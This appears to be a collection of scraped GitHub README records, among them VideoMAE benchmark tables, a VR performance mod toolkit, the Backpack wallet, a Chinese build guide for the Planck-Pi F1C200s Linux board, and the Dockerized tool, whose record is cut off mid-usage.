AVA 2.2 Please check the code and checkpoints in VideoMAE-Action-Detection . | Method | Extra Data | Extra Label | Backbone | #Frame x Sample Rate | mAP | | :------: | :----------: | :---------: | :------: | :------------------: | :--: | | VideoMAE | Kinetics-400 | ✗ | ViT-S | 16x4 | 22.5 | | VideoMAE | Kinetics-400 | ✓ | ViT-S | 16x4 | 28.4 | | VideoMAE | Kinetics-400 | ✗ | ViT-B | 16x4 | 26.7 | | VideoMAE | Kinetics-400 | ✓ | ViT-B | 16x4 | 31.8 | | VideoMAE | Kinetics-400 | ✗ | ViT-L | 16x4 | 34.3 | | VideoMAE | Kinetics-400 | ✓ | ViT-L | 16x4 | 37.0 | | VideoMAE | Kinetics-400 | ✗ | ViT-H | 16x4 | 36.5 | | VideoMAE | Kinetics-400 | ✓ | ViT-H | 16x4 | 39.5 | | VideoMAE | Kinetics-700 | ✗ | ViT-L | 16x4 | 36.1 | | VideoMAE | Kinetics-700 | ✓ | ViT-L | 16x4 | 39.3 | ✨ UCF101 & HMDB51 | Method | Extra Data | Backbone | UCF101 | HMDB51 | | :------: | :----------: | :------: | :----: | :----: | | VideoMAE | no | ViT-B | 91.3 | 62.6 | | VideoMAE | Kinetics-400 | ViT-B | 96.1 | 73.3 | 🔨 Installation Please follow the instructions in INSTALL.md . ➡️ Data Preparation Please follow the instructions in DATASET.md for data preparation. 🔄 Pre-training The pre-training instruction is in PRETRAIN.md . ⤴️ Fine-tuning with pre-trained models The fine-tuning instruction is in FINETUNE.md . 📍Model Zoo We provide pre-trained and fine-tuned models in MODEL_ZOO.md . 👀 Visualization We provide the script for visualization in vis.sh . Colab notebook for better visualization is coming soon. ☎️ Contact Zhan Tong: tongzhan@smail.nju.edu.cn 👍 Acknowledgements Thanks to Ziteng Gao , Lei Chen, Chongjian Ge , and Zhiyu Zhao for their kind support. This project is built upon MAE-pytorch and BEiT . Thanks to the contributors of these great codebases. 🔒 License The majority of this project is released under the CC-BY-NC 4.0 license as found in the LICENSE file. Portions of the project are available under separate license terms: SlowFast and pytorch-image-models are licensed under the Apache 2.0 license. BEiT is licensed under the MIT license. ✏️ Citation If you think this project is helpful, please feel free to leave a star⭐️ and cite our paper: ``` @inproceedings{tong2022videomae, title={Video{MAE}: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training}, author={Zhan Tong and Yibing Song and Jue Wang and Limin Wang}, booktitle={Advances in Neural Information Processing Systems}, year={2022} } @article{videomae, title={VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training}, author={Tong, Zhan and Song, Yibing and Wang, Jue and Wang, Limin}, journal={arXiv preprint arXiv:2203.12602}, year={2022} } ```;[NeurIPS 2022 Spotlight] VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training;self-supervised-learning,action-recognition,video-understanding,masked-autoencoder,transformer,vision-transformer,video-transformer,mae,pytorch,video-representation-learning
MCG-NJU/VideoMAE
fholger/vrperfkit;VR Performance Toolkit Performance-oriented collection of mods for VR games. Included mods: Upscaling techniques (render at lower resolution and upscale to target resolution) AMD FidelityFX Super Resolution NVIDIA Image Scaling AMD Contrast Adaptive Sharpening Fixed foveated rendering (render center of image at full resolution, but drop resolution towards edges) Variable Rate Shading (only for NVIDIA RTX / GTX 16xx cards) Planned mods: "Fixed foveated" rendering (render fewer pixels at the edges of the screen) Radial Density Masking (all GPUs, but works only with a handful of games) Force hidden area mask: don't render pixels at the edges that are not visible in the headset. Many games already use this mask, but not all. This mod will allow you to force its usage. Supported VR runtimes: Oculus OpenVR Supported graphics APIs: Direct3D 11 Installation Extract dxgi.dll and vrperfkit.yml next to the game's main executable. For Unreal Engine games, this is typically <Game>Game\Binaries\Win64\<Game>Game-Win64-Shipping.exe . Edit the vrperfkit.yml config file to your heart's content. The available options are documented inside the config file; you'll have to experiment with them and try which options work for your particular game. Build instructions Clone the repository and init all submodules. git clone https://github.com/fholger/vrperfkit.git cd vrperfkit git submodule init git submodule update --recursive Download the Oculus SDK and extract LibOVR from the downloaded archive to the ThirdParty folder. Download NVAPI (requires NVIDIA developer account) and extract the contents of the Rxxx-developer folder to ThirdParty\nvapi . Run cmake to generate Visual Studio solution files. Build with Visual Studio. Note: Ninja does not work, due to the included shaders that need to be compiled. This is only supported with VS solutions.;VR Performance Toolkit;[]
fholger/vrperfkit
btholt/complete-intro-to-web-dev-v3;Build your first web app with little code experience with industry veteran Brian Holt. Course code icon created by Freepik - Flaticon License The code is this repo is licensed under the Apache 2.0 license. The content is licensed under CC-BY-NC-4.0.;The Complete Intro to Web Dev v3, as taught on Frontend Masters;[]
btholt/complete-intro-to-web-dev-v3
coral-xyz/backpack;Backpack A home for your xNFTs Note Backpack is in active development, so all APIs are subject to change. This code is unaudited. Use at your own risk. I repeat. This is not ready for production. Table of contents: Table of contents: Installing the Latest Release Developing Locally Pull the code Temporary preliminary steps Enable self-signed local SSL certs Environment variables Install dependencies Build all packages for production Start everything inside ./packages for development Troubleshooting Install the development version of the extension Not seeing the dev folder? Optionally install the built extension License Installing the Latest Release If you'd like to install the latest dev release, grab the latest build.zip here and add it to your local chrome profile, using developer mode. See the video below. Developing Locally https://user-images.githubusercontent.com/101902546/173857300-fc139113-0af5-46fc-baad-236a2ebf63f1.m4p Pull the code bash git clone git@github.com:coral-xyz/backpack.git cd backpack Temporary preliminary steps Enable self-signed local SSL certs Go to chrome://flags/#allow-insecure-localhost and enable the toggle, then restart chrome. Note: Please don't enable this if you don't know what you're doing. It will leave you vulnerable to exploits if left on. It is recommended to undo this step when you are done developing. Environment variables Install dependencies bash yarn install You can also optionally rename .env.example to .env and set your own variables. Build all packages for production bash yarn build Start everything inside ./packages for development bash yarn start Note: In a fresh repo, you should run yarn build before yarn start . Troubleshooting If you run into issues with builds try running yarn clean and then start again. Seeing `WebSocket connection to 'wss://localhost:9997/ws' failed` error messages in your console? You need to install a SSL certificate for localhost as the one provided by [webpack-dev-server is considered invalid](https://github.com/webpack/webpack-dev-server/issues/2957). This step is optional as `react-refresh` will still function without it, but it's a good idea to try and fix this error because otherwise your browser will be making a lot of failed requests and `webpack-dev-server` might not be functioning to its full capabilities. A relatively simple way of doing this is using [mkcert](https://github.com/FiloSottile/mkcert) Instructions for how to install a trusted self-signed cert on macOS - ``` cd packages/app-extension brew install mkcert mkcert localhost mkcert -install ``` Now the next time you run `yarn start` the errors should no longer appear. Install the development version of the extension Go to chrome://extensions, enable developer mode (top right) and drag the packages/app-extension/dev dir into the window. This version will have (Dev) in the title and supports live-reloading. Not seeing the dev folder? Do you have a stale node process running? Try to kill it all: killall -9 node and start over Try running yarn start from within packages/app-extension while running yarn start from root. This should work. Optionally install the built extension If you want to try the production build of the extension, run yarn build and drag the packages/app-extension/build dir into chrome://extensions as above. This version won't have hot-reloading and local plugins won't be visible unless you also run yarn start License Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion by you shall be licensed at the discretion of the repository maintainers without any additional terms or conditions.;🎒 Next level crypto wallet;[]
coral-xyz/backpack
Zaplib/zaplib;⚡ Zaplib Zaplib is an open-source library for speeding up web applications using Rust and WebAssembly. It lets you write high-performance code in Rust, alongside your existing JavaScript code, using simple APIs. To get started, view the docs . License Zaplib is distributed under the terms of both the MIT license and the Apache License (version 2.0). See LICENSE-APACHE and LICENSE-MIT for details. Third party license notices are available in LICENSES-THIRD-PARTY .;⚡ Zaplib is an open-source library for speeding up web applications using Rust and WebAssembly.;[]
Zaplib/zaplib
peng-zhihui/Planck-Pi;0.说明 芯片介绍 基础知识 1. F1Cxxxs芯片的上电启动顺序 2. 开发工具链下载 1.硬件开发 2.环境准备 2.1 准备Docker开发环境 2.1.1 安装依赖软件 2.2.2 安装编译工具链 2.4 常规编译方法 2.5 烧写方法 3.u-boot开发 4.Linux内核开发 5.root-fs开发 5.1 准备环境 5.2 构建Debian文件系统 5.3 配置文件系统 5.3.1 最小配置 5.3.2 增加开机自启脚本 5.3.3 解决root-fs分区开机后被挂载为 Read-Only 的问题 5.3.4 添加USB-OTG & Gadget-RNDIS功能 5.3.5 启用swap 5.4 打包&部署文件系统 6.应用开发 6.1 系统应用集成 6.2 驱动开发 6.3 Linux App开发 7.问题总结 0.说明 本项目是一个基于全志F1C200s芯片的超迷你&低成本的Linux开发板,本来是用于个人的某个小项目调试,现把所有硬件、软件(u-boot、内核、root-fs)开源出来。 板载资源: 一个OLED 128x80 一个麦克风 & 功放可以外接喇叭 双面不同功能的Type-C接口分别提供 USB转串口 以及 USB-OTG 功能 一个USB-A口用于外接设备 SD卡插槽 引出绝大部分IO 板卡成本应该不到50RMB,而且提供了很多资料,很适合用于新手作为入门Linux学习的开发板。 芯片介绍 全志F1C200s是全志的一款高度集成、低功耗的移动应用处理器,可用于多种多媒体音视频设备中。 F1C200s 基于ARM 9架构,芯片集成了SiP的DDR,外围电路可以极其简单;它支持高清视频解码,包括H.264、H.263、MPEG 1/2/4等,还集成了音频编解码器和I2S/PCM接口,是一款开发简单、性价比较高的产品,也适合用来做入门级的Linux开发板。 | 功能 | 描述 | | ------------ | ------------------------------------------------------------ | | CPU | ARM9 CPU architecture,16KByte D-Cache,2KByte I-Cache | | Memory | SIP 64MB DDR1,SD2.0,eMMC 4.41 | | Video | H.264 1920x1080@30fps decoding MPEG1/2/4 1920x1080@30fps decoding MJPEG 1280x720@30fps encoding JPEG encode size up to 8192x8192 | | Camera | 8-bit CMOS-sensor interface CCIR656 protocol for NTSC and PAL | | Audio | Integrated analog audio codec with two DAC channels and one ADC channel,maximum 192kHz DAC sample rate and 48kHz ADC sample rate One I2S/PCM interface | | Display | LCD RGB interface up to 1280x720@60fps TV CVBS output, support NTSC/PAL, with auto plug detecting | | Connectivity | USB OTG, SDIO,IR, 3 x TWI, 2 x SPI, 3 x UART | | OS | Melis, Linux OS | | Package | QFN88, 10mm x 10mm | | Process | 40nm | | 特点 | 支持H.264 1920x1080@30fps 解码 支持MJPEG 1280x720@30fps 编码 集成 64MB DDR1,集成音频CODEC 低成本,低功耗,开发简单 | 与其他系列芯片的对比: 基础知识 1. F1Cxxxs芯片的上电启动顺序 芯片可以从SPI Flash或者SD-Card中启动,因为Flash容量较小可玩性不高,后文都是以SD卡启动为主的。 参考: F1C100s启动时搜索SPI Flash的顺序? 上电后, f1c100s内部 BROM (芯片内置,无法擦除) 启动; 首先检查 SD0 有没有插卡, 如果有插卡就读卡 8k偏移数据,是否是合法的启动数据, 如果是BROM 引导结束, 否则进入下一步; 检测SPI0 NOR FLASH(W25QXXX, MX25LXXX) 是否存在, 是否有合法的启动数据, 如果是BROM 引导结束, 否则进入下一步; 检测SPI0 NAND FLASH 是否存在, 是否有合法的启动数据, 如果是BROM 引导结束, 否则进入下一步; 因为找不到任何可以引导的介质, 系统进入usb fel 模式, 可以用USB烧录了。 2. 开发工具链下载 编译工具链官网:https://www.linaro.org/ 或 Arm GNU Toolchain ,以linaro为例:进入 support->downloads 可以看到下载页面,点击 GNU cross-toolchain binary archives ,可以进入对应 下载列表 ,可以看到各个版本的toolchain,这里我使用的 latest-7/arm-linux-gnueabi/ 即 gcc-linaro-7.5.0-2019.12-x86_64_arm-linux-gnueabi 即可。 1.硬件开发 原理图见仓库的源文件和PDF,需要说明的点是: 板子的Type-C采用正反插不同功能,正面是USB转TTL串口功能,用于内核调试,反面是芯片的USB功能,在内核中我开启了USB的RNDIS网卡也就是说可以通过这个USB口模拟出一个网卡然后共享电脑的网络, 也就不需要外接WiFi和以太网模块了很方便。 由于芯片只有一个USB接口,因此为了能使板子作为Host外接其他设备,我在板卡上添加了一个OTG的跳线: 正常情况下不接跳线的话OTG功能为Device模式,也就是可以通过TypeC接口模拟网卡或者其他设备如MTP;当插上跳线帽之后,就可以作为Host在右边的A口插入USB设备了如U盘、键盘、鼠标等, 注意此时C口的USB功能失效,需要通过串口登录板子。 2.环境准备 推荐直接使用我配置好的完整镜像,用Etcher等工具直接烧写到SD卡里即可以使用,方便又好用~ 镜像的账户: pi 密码:planck root 密码:planck 下面的教程是给需要自己配置uboot、内核、文件系统的人看的。 2.1 准备Docker开发环境 为了最小化编译环境,这里采用Docker构建ubuntu20.04镜像的方式来搭建环境。 2.1.1 安装依赖软件 首先需要自己安装一下Docker(百度一下教程),然后pull一下Ubuntu官方的Docker镜像到本地,选择版本为 ubuntu:20.04 : sudo docker pull ubuntu:20.04 实际操作中使用了我自己预先配置好的本地镜像(安装了nano、ssh等软件,更新了国内的apt源等)。 然后启动容器(修改为你自己的相关路径): sudo docker run -it --name planck-pi-env --network host \ -p 8022:22 \ -v /home/pengzhihui/WorkSpace:/workspace \ --privileged \ planck-pi-env.image:latest 进入容器之后执行 apt update 核 apt upgrade 更新软件,接下来安装依赖的软件包: sudo apt-get install xz-utils nano wget unzip build-essential git bc swig libncurses5-dev libpython3-dev libssl-dev pkg-config zlib1g-dev libusb-dev libusb-1.0-0-dev python3-pip gawk bison flex 2.2.2 安装编译工具链 按照前文介绍的地址下载工具链(可以在VMware宿主机进入共享文件夹操作): wget http://releases.linaro.org/components/toolchain/binaries/7.2-2017.11/arm-linux-gnueabi/gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi.tar.xz 注意: GCC版本要大于 6;此处为获取交叉编译链为7.2.1版本,也可以自行下载其他版本。 将工具链压缩包解压: mkdir /usr/local/arm tar -vxf gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi.tar.xz -C /usr/local/arm 配置环境变量: nano ~/.bashrc 打开文件添加下面的变量: export PATH=$PATH:/usr/local/arm/gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi/bin 使环境变量立即生效 : source ~/.bashrc 查询版本,确认安装成功 : arm-linux-gnueabi-gcc -v 配置完成后可以commit容器到镜像方便未来部署: sudo docker commit planck-pi-env planck-pi-env.image sudo docker save -o planck-pi-env.image.tar planck-pi-env.image 2.4 常规编译方法 进入源码目录, 执行下述命令进行编译: make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- -j4 在uboot顶层 Makefile 的250行左右,添加默认编译器,就可以直接用 make 编译省去后面的参数了: ``` ifeq ($(HOSTARCH),$(ARCH)) CROSS_COMPILE ?= endif ARCH ?= arm CROSS_COMPILE ?= arm-linux-gnueabi- ``` 2.5 烧写方法 FEL烧写方法这里不使用, 有兴趣可以参考这些教程了解: 全志sunxi-tools烧录工具安装和使用 全志V3S 编译运行xboot笔记 这里介绍TF卡的烧写方法。 在TF卡上构建系统之前,需要将TF卡进行分区与格式化。 也可以使用GParted等软件做图形化的操作: 命令行方式如下,首先查看电脑上已插入的TF卡的设备号(一般为 /dev/sdb1,下面以/dev/sdb1为例: sudo fdisk -l 若自动挂载了TF设备,先卸载(有多个分区则全部卸载): sudo umount /dev/sdb1... 进行分区操作: sudo fdisk /dev/sdb 操作步骤如下: 若已存分区即按 d 删除各个分区 通过 n 新建分区,第一分区暂且申请为1M用于储存uboot-with-spl,第二分区32M用于储存Linux内核,剩下的空间都给root-fs 第一分区操作 :p 主分区、默认 1 分区、默认2048、+16M n p [Enter] [Enter] [Enter] +1M 第二分区操作 :p 主分区、2 分区、默认2048、+128M n p [Enter] [Enter] [Enter] +128M 第三分区操作 :p 主分区、3 分区、默认2048,剩下的全部分配 n p [Enter] [Enter] [Enter] [Enter] w 保存写入并退出 分区格式化: sudo mkfs.vfat /dev/sdb1 # 将第1分区格式化成FAT sudo mkfs.ext4 /dev/sdb2 # 将第2分区格式化成FAT sudo mkfs.ext4 /dev/sdb3 # 将第3分区格式化成EXT4 格式说明: EXT4:只用于Linux系统的内部磁盘 NTFS:与Windows共用的磁盘 FAT:所有系统和设备共用的磁盘 使用dd将 u-boot-sunxi-with-spl.bin 烧写进第一分区: sudo dd if=path/to/u-boot-sunxi-with-spl.bin of=/dev/sdb bs=1024 seek=8 sync 注意: 这里的 bs=1024 seek=8 是添加了8192字节的偏移,之所以要加8K偏移是因为FSBL也就是bootROM里面硬写死了会从设备的8K地址处加载SPL,然后进入uboot。因此上面烧写的时候,指定的偏移地址一定是 相对于储存设备硬件的偏移,而不是相对于分区的偏移 ! 8K的来源是参考 buildroot-mangopi-r/board/allwinner/generic/genimage-sdcard.cfg 文件的描述 offset = 0x2000 。 是否单独划分一个uboot分区其实不重要,因为烧写的时候直接覆盖了但是我们人为设置一个1M大小的区间分隔开,便于和后面的内核储存分区区分。 关于genimage的使用,可以参考billdroot官方的文档描述: The Buildroot user manual 。 ``` image bootfs.vfat { vfat { files = { "zImage", "devicetree.dtb" } } size = 8M } image sysimage-sdcard.img { hdimage { } partition u-boot { image = "u-boot-sunxi-with-spl.bin" offset = 0x2000 size = 1016K # 1MB - 8192 } partition boot { partition-type = 0xC bootable = "true" image = "bootfs.vfat" } partition rootfs { partition-type = 0x83 image = "rootfs.ext4" } } `` * 关于上面 partition-type 的含义可以参考:[Listing of MBR/EBR Partition Types](https://thestarman.pcministry.com/asm/mbr/PartTypes.htm) 。 * 对于内核的FAT分区,分区完挂载之后直接把zImage和dtb文件放进去就行了,至于如何指定内核镜像和设备树所在分区,可以参考 configs/uboot.env`里面的配置,启动的时候相关参数是在这里被传递给内核的。 3.u-boot开发 【待补充】 * uboot的文件结构 . ├── api //封装一些平台无关的操作,如字符串打印,显示,网络,内存 ├── arch //以平台架构区分 │ ├──arm │ │ └──cpu │ │ │ └──arm926ejs │ │ │ │ └──sunxi //cpu相关的一些操作,如定时器读取 │ │ │ │ │ └──u-boot-spl.lds //spl的放置方法 │ │ └──dts │ │ │ └──suniv-f1c100s-licheepi-nano.dts // f1c100s芯片的一些配置 │ │ │ └──suniv-f1c100s-licheepi-nano.dtb │ │ │ └──suniv-f1c100s.dtsi │ │ │ └──suniv.dtsi │ │ └──lib //一些库文件 │ │ └──mach-sunxi │ │ │ └──board.c //board_init_f │ │ │ └──dram_sun4i.c //ddr的操作,复位,时钟,延时,odt,etc. │ │ │ └──dram_helpers.c //ddr的设置及读写测试 ├── board │ ├──sunxi │ │ └──board.c //sunxi_board_init 入口 │ │ └──dram_suniv.c //DRAM的一些默认参数 ├── cmd //Uboot命令行的一些命令 ├── common //含spl ├── configs //menuconfig里的默认配置,比如各类驱动适配 │ ├── licheepi_nano_defconfig │ ├── licheepi_nano_spiflash_defconfig ├── disk //硬盘分区的驱动 ├── doc ├── drivers //外设驱动 ├── dts ├── examples ├── fs //多种文件系统 ├── include │ ├──configs │ │ └──sunxi_common.h //预配置的参数,如串口号等 │ │ └──suniv.h ├── lib //加密压缩等算法 ├── net //nfs,tftp等网络协议 ├── post ├── scripts 4.Linux内核开发 5.root-fs开发 由于F1C200s的RAM只有64M,无法支持像是Ubuntu-Core这样的文件系统(最低RAM需求512M),所以一般只能用buildroot来生成简单的文件系统,或者裸机开发。 但是为了方便地使用Debian系的丰富软件,我们可以自己构建Debian最小系统,最小rootfs在180MB左右。 5.1 准备环境 安装构建文件系统的工具主要有两个: 一个是qemu用来模拟ARM9的芯片架构,基于qemu模拟器可以在x86的宿主机上通过chroot切换到ARM环境然后完成root-fs的各种配置。 一个是debootstrap ,用来构建Debian文件系统。 注意: 上述软件都是需要在安装了交叉编译环境的Docker容器下运行的,否则编译出来的文件系统上版运行的时候会报格式错误。 Docker中运行下面的命令安装软件: apt install qemu-user-static apt install debootstrap mkdir path/to/rootfs-debian 5.2 构建Debian文件系统 构建文件系统之前,需要知道我们想要构建哪个版本的文件系统,这里从 Debian 全球镜像站 选择访问速度快的源,这里使用华为源:mirrors.huaweicloud.com。 注意: 选择的源需要支持硬件架构 armel ,因为F1Cxxxs是 armel 架构的芯片。 关于不同架构的区别: armel : arm eabi little endian 的缩写,针对旧的 32 位 ARM 处理器,而不支持硬件浮点单元(FPU) armhf: arm hard float 的缩写,仅适用于较新的 32 位 ARM 处理器,其至少实现了 ARMv7 架构,且支持 ARM 矢量浮点规范(VFPv3)第 3 版 arm64: 适用于 64 位 ARM 处理器,64位的arm默认就是hf的,其至少实现了 ARMv8 架构 然后就是debian的版本,使用最新的 buster : debootstrap --foreign --verbose --arch=armel buster rootfs-debian http://mirrors.huaweicloud.com/debian/ cd rootfs-debian mount --bind /dev dev/ mount --bind /sys sys/ mount --bind /proc proc/ mount --bind /dev/pts dev/pts/ cd .. cp /usr/bin/qemu-arm-static rootfs-debian/usr/bin/ chmod +x rootfs-debian/usr/bin/qemu-arm-static LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian /debootstrap/debootstrap --second-stage --verbose LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian 5.3 配置文件系统 5.3.1 最小配置 构建完成之后,需要在Docker中chroot进去修改密码等配置,通过下面的命令进入chroot环境: LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian 注意: 前文启动Docker容器的时候,一定要加 --privileged 参数,否则上面mount指令会报权限错误。 上面最后一条命令chroot完成,此时可以用 apt-get 等命令给文件系统安装需要的软件包,修改root登录密码等操作: ``` apt install net-tools usbutils ssh passwd root 修改密码 nano /etc/ssh/sshd_config 添加SSH权限,修改为PermitRootLogin yes ``` 可能会出现无法使用方向键的问题,输入 bash 命令进入bash窗口即可。 5.3.2 增加开机自启脚本 文件系统中的 /etc/init.d 负责linux的服务的开启和关闭等,为了能使系统开机自动运行一些脚本和命令,这里介绍如何新添加一个自启动项。 首先我们创建一个文件 /etc/init.d/runOnBoot ,内容如下: ``` !/bin/sh /etc/init.d/runOnBoot BEGIN INIT INFO Provides: runOnBoot Required-Start: $local_fs $syslog $network Required-Stop: $local_fs $syslog $network Default-Start: 2 3 4 5 Default-Stop: 0 1 6 Short-Description: runOnBoot startup Description: runOnBoot auto startup 1.0 END INIT INFO ------------------------------------------------------------------------------ swapon /opt/images/swap mkdir /sys/kernel/config/usb_gadget/gg cd /sys/kernel/config/usb_gadget/gg echo "0x0502" > idVendor echo "0x3235" > idProduct mkdir functions/rndis.rn0 mkdir configs/c1.1 ln -s functions/rndis.rn0 configs/c1.1/ echo "musb-hdrc.1.auto" > UDC ifconfig usb0 192.168.137.2 ifconfig usb0 up route add default gw 192.168.137.1 Demo to run a script ↓ script_path=/home/start.sh if [ ! -r ${script_path} ]; then echo ${script_path} not existing; fi . ${myStart_spaddr} ------------------------------------------------------------------------------ ``` 给文件添加可执行权限: chmod +x /etc/init.d/runOnBoot 最后要添加软链接: ln -s /etc/init.d/runOnBoot /etc/rc2.d/S99runOnBoot /etc/rc.d/rc0.d/ ~ /etc/rc.d/rc6.d/ 文件夹的含义不同,S开头代表是开启时处理的脚本,按照后面紧跟的数字进行按顺序启动,S99则是最后进行启动。 重启即可看到命令和脚本自动执行了。 5.3.3 解决root-fs分区开机后被挂载为 Read-Only 的问题 新配置的文件系统需要添加fstab进行对应分区的自动挂载,修改 /etc/fstab 文件: ``` /dev/root / ext2 rw,noauto 0 1 proc /proc proc defaults 0 0 devpts /dev/pts devpts defaults,gid=5,mode=620,ptmxmode=0666 0 0 tmpfs /dev/shm tmpfs mode=0777 0 0 tmpfs /tmp tmpfs mode=1777 0 0 tmpfs /run tmpfs mode=0755,nosuid,nodev 0 0 sysfs /sys sysfs defaults 0 0 /opt/images/swap swap swap defaults 0 0 ``` 5.3.4 添加USB-OTG & Gadget-RNDIS功能 参考资料: 全志平台上通过configfs(libcomposite)配置RNDIS Gadget(u_ether)及Windows下的驱动 USB Gadget/Ethernet - linux-sunxi.org LicheePi入坑记录2——使用 Linux Gadget 复合设备共享网络与虚拟串口 – LotLab USB Gadget (小饰品),就是指所开发的电子设备以USB-device的模式通过USB连接到主机,比如手机用USB线插入PC后,手机就是USB Gadget。 在本开发板中,可以利用USB Gadget把USB模拟成虚拟网卡、虚拟串口、MTP设备等等非常方便,下面介绍具体的配置方法。 RNDIS功能开发方法: 首先需要在内核中开启了相关选项: Device Drivers ---> [*] USB support ---> <M> Inventra Highspeed Dual Role Controller (TI, ADI, AW, ...) MUSB Mode Selection (Dual Role mode) ---> *** Platform Glue Layer *** <M> Allwinner (sunxi) *** MUSB DMA mode *** [*] Disable DMA (always use PIO) USB Physical Layer drivers ---> <M> NOP USB Transceiver Driver <M> USB Gadget Support ---> <M> USB Gadget functions configurable through configfs [*] RNDIS 然后在文件系统中添加一些配置文件: cd /sys/kernel/config/usb_gadget mkdir gg cd gg/ echo "0x0502" > idVendor echo "0x3235" > idProduct mkdir functions/rndis.rn0 mkdir configs/c1.1 ln -s functions/rndis.rn0 configs/c1.1/ echo "musb-hdrc.1.auto" > UDC 启用usb0网卡并设置一个ip地址: ifconfig usb0 192.168.137.2 ifconfig usb0 up 这里使用137网段的原因是希望后面通过Windows的网络共享功能让板卡通过USB连上互联网,而Windows的共享网段固定是 192.168.137.1 。 在Windows端安装驱动,手动选择网络适配器,然后添加下面的驱动: 之后会在网络适配器中发现新的网卡设备,配置固定ip如下: 此时通过ping命令应该可以相互ping通了,但是在板卡上可能还是无法连接互联网,需要配置一下默认网关和DNS服务器: ``` route add default gw 192.168.137.1 但是这样重启以后就不能用了,需要添加到自启脚本中 ``` DNS记录在 /etc/resolv.conf 这个文件里,可以按 resolv.conf 文件的格式修改DNS。 ``` nano /etc/resolv.conf 修改为: nameserver 8.8.8.8 ``` 如果可以ping通www.baidu.com就说明配置完成了。 5.3.5 启用swap 芯片的SiP内存只有64MB,大部分情况下都不够用,所以需要开启swap使用内存卡的一部分空间来作为交换内存。 通过free -m来查看下内存使用状况: ``` free -m total used free shared buff/cache available Mem: 54 15 6 0 31 34 Swap: 0 0 0 ``` 创建一个自定义的目录 /opt/images/ : mkdir /opt/images/ rm -rf /opt/images/swap 创建一个需要内存大小的文件,如512M: ``` dd if=/dev/zero of=/opt/images/swap bs=1024 count=512000 2048000+0 records in 2048000+0 records out 2097152000 bytes (2.1 GB, 2.0 GiB) copied, 30.3635 s, 69.1 MB/s ``` 把创建的文件变成SWAP分区并启用: mkswap /opt/images/swap swapon /opt/images/swap free -m 看看SWAP是否生效,ok的话设置开机自动挂载swap: ``` nano /etc/fstab 添加一行: /opt/images/swap swap swap defaults 0 0 ``` 5.4 打包&部署文件系统 配置完成后清理一下缓存,然后退出chroot环境: apt clean exit 在Docker中umount相关文件夹: umount dev/ 进入文件系统并添加压缩包打包相关文件: cd rootfs-debian tar cvf ../rootfs-debian.tar . 生成的 rootfs-debian.tar 任意解压到SD卡的文件系统分区即可。 或者直接插上SD卡拷贝所有文件(需要在VMware宿主机打开终端操作),在挂载的SD卡root-fs磁盘打开终端,输入: sudo cp -Rf path/to/rootfs-debian/* ./ 然后插上板卡即可启动。 后续配置,在超级用户权限下执行如下两个命令: ```bash chown root:root /usr/bin/sudo chmod 4755 /usr/bin/sudo nano /etc/hosts 在localhost后面添加一个自己的用户名如pi ``` 6.应用开发 6.1 系统应用集成 6.2 驱动开发 6.3 Linux App开发 7.问题总结 SSH无法连接:Permissions xxx for '/etc/ssh/ssh_host_rsa_key' are too open 其他参考资料 【目录】全志F1C100S/F1C200S学习笔记 《保姆级教程》全志F1C100S/F1C200S spi-flash 启动全流程适配烧录及踩坑指南 MangoPi 芒果派 | f1c200s 荔枝派Nano 全流程指南;Super TINY & Low-cost Linux Develop-Kit Based On F1C200s.;[]
peng-zhihui/Planck-Pi
antfu/handle;汉兜 Handle A Chinese Hanzi variation of Wordle . 汉字 Wordle. handle.antfu.me 请勿剧透!PLEASE DO NOT SPOIL Note 汉兜的答案库至 2023 年 2 月 28 日为止将 不再更新 ;后序的题目将从过往一年的题目中随机抽取。仓库以 MIT 协议开放,在注明原始仓库与作者的条件下,欢迎 Fork 与修改。感谢大家的对汉兜的支持与喜爱。 Development Setup Insall Node.js >=v16 and pnpm Run pnpm install Run pnpm dev and visit http://localhost:4444 成语勘误 成语数据库储存于 ./src/data/idioms.txt - 已知的成语列表 ./src/data/polyphones.json - 特殊发音的成语列表 二者互不包含。 如遇到成语缺失或发音错误,请编辑 ./src/data/new.txt 文件,一行一词,完成后执行 pnpm run update 命令,脚本会自动抓取 汉典 的数据更新成语数据库。如遇汉典中也缺失的成语,其会留存在 new.txt 中,需要手动判断与添加。 Tech Stack Vue 3 Vite VueUse UnoCSS Vitesse Lite License MIT License © 2021-PRESENT Anthony Fu;A Chinese Hanzi variation of Wordle - 汉字 Wordle;wordle,game,wordle-chinese
antfu/handle
datastack-net/dockerized;Dockerized Run popular commandline tools without installing them. shell dockerized <command> Supported commands If your favorite command is not included, it can be added very easily. See Customization . Dockerized will also fall back to over 150 commands defined in jessfraz/dockerfiles . Cloud aws az (Azure CLI) doctl s3cmd Database dolt mssql mysql postgres psql pg_dump pg_dumpall Dev-Ops & Docker ansible ansible-playbook helm Git git gh (Github) Languages & SDKs dotnet go gofmt (haskell) ghci java perl php composer (prolog) swipl (SWI-Prolog) lua node npm npx vue yarn python pip python python2 ruby gem rake (rust) rustc typescript tsc Networking http telnet wget Unix tree zip Other jq mkdocs (latex) pdflatex protoc scrapy swagger-codegen youtube-dl (Youtube downloader) Installation Make sure Docker is installed on your machine. Download the latest zip from our Release Page . Extract it to a folder, for example your home directory. Add the dockerized/bin directory to your PATH Instructions **Linux / MacOS:** ```bash export PATH="$PATH:$HOME/dockerized/bin" ``` **Windows** > See: [How to add a folder to `PATH` environment variable in Windows 10](https://stackoverflow.com/questions/44272416) Running from source You can run dockerized directly from source-code. Installation from Source - Requirements: - [Git](https://git-scm.com/downloads) - [Docker](https://docs.docker.com/get-docker/) - Steps - Clone the repository ```shell git clone https://github.com/datastack-net/dockerized.git ``` - Run `dockerized`: ```shell bin/dockerized --help ``` - The first time you run dockerized, it will compile itself. - Compilation is done within docker, no dependencies needed. - To re-compile after changing the source code, run: - `dockerized --compile` (runs within docker) - `dockerized --compile=host` (runs on your machine, requires Go 1.17+) - You do not need to re-compile to add commands. See [Add a command](DEV.md). Usage Run any supported command, but within Docker. shell 